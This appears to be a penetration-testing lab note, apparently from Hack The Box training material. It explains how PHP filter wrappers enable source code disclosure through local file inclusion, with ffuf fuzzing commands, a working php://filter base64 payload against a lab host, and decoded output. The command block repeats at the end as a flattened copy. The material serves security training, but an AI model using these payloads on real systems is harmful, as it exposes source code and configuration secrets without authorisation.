SOURCE CODE DISCLOSURE

php wrappers can be used to access different I/O streams at the application level such as standard input/output, file descriptors, and memory streams. attackers can utilize these wrappers to extend their exploitation attacks and be able to read PHP source code files or even execute system commands.

php filters are a type of php wrappers and has the syntax of "php://filter/". the filter wrapper has several parameters but the main ones used are "resource" and "read". the resource parameter is used when specifying the stream to apply the filter on (e.g., a local file). the read parameter is used when applying different filters on the input resource. the four types of filters available for use are: , , , and . the filters that is most useful for LFI attacks is the "convert.base64-encode" filter under the "Conversion Filters".

root@htb:~$ locate directory-list-2.3-small.txt
root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .

#fuzz for php  files
root@htb:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.50.242:54236/FUZZ.php -ic
 index                   [Status: 200, Size: 2652, Words: 690, Lines: 64, Duration: 73ms]
 en                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms]
 es                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms]
 configure               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 75ms]

 * the -ic flag ignores wordlist comments

 * do not limit the scanning to only HTTP 200 response codes. include all codes such as
   `301`, `302` and `403` as the source can be read from those pages and may contain
   valuable information

#use basic PHP filters to read PHP source code
root@htb:~$ BROWSER > http://94.237.50.242:54236/index.php?language=php://filter/read=convert.base64-encode/resource=config
 * view the page source to ensure the entire encoded string is copied, else it won't fully decode

root@htb:~$ echo 'PD9waHAK...SNIP...KICB9Ciov' | base64 -d
 ...SNIP...

 if ($_SERVER['REQUEST_METHOD'] == 'GET' && realpath(__FILE__) == realpath($_SERVER['SCRIPT_FILENAME'])) {
   header('HTTP/1.0 403 Forbidden', TRUE, 403);
   die(header('location: /index.php'));
 }

 ...SNIP...

PreviousBASIC BYPASSES NextRCE

Last updated 3 months ago

root@htb:~$ locate directory-list-2.3-small.txt root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt . #fuzz for php files root@htb:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.50.242:54236/FUZZ.php -ic index [Status: 200, Size: 2652, Words: 690, Lines: 64, Duration: 73ms] en [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms] es [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms] configure [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 75ms] * the -ic flag ignores wordlist comments * do not limit the scanning to only HTTP 200 response codes. include all codes such as `301`, `302` and `403` as the source can be read from those pages and may contain valuable information #use basic PHP filters to read PHP source code root@htb:~$ BROWSER > http://94.237.50.242:54236/index.php?language=php://filter/read=convert.base64-encode/resource=config * view the page source to ensure the entire encoded string is copied, else it won't fully decode root@htb:~$ echo 'PD9waHAK...SNIP...KICB9Ciov' | base64 -d ...SNIP... if ($_SERVER['REQUEST_METHOD'] == 'GET' && realpath(__FILE__) == realpath($_SERVER['SCRIPT_FILENAME'])) { header('HTTP/1.0 403 Forbidden', TRUE, 403); die(header('location: /index.php')); } ...SNIP...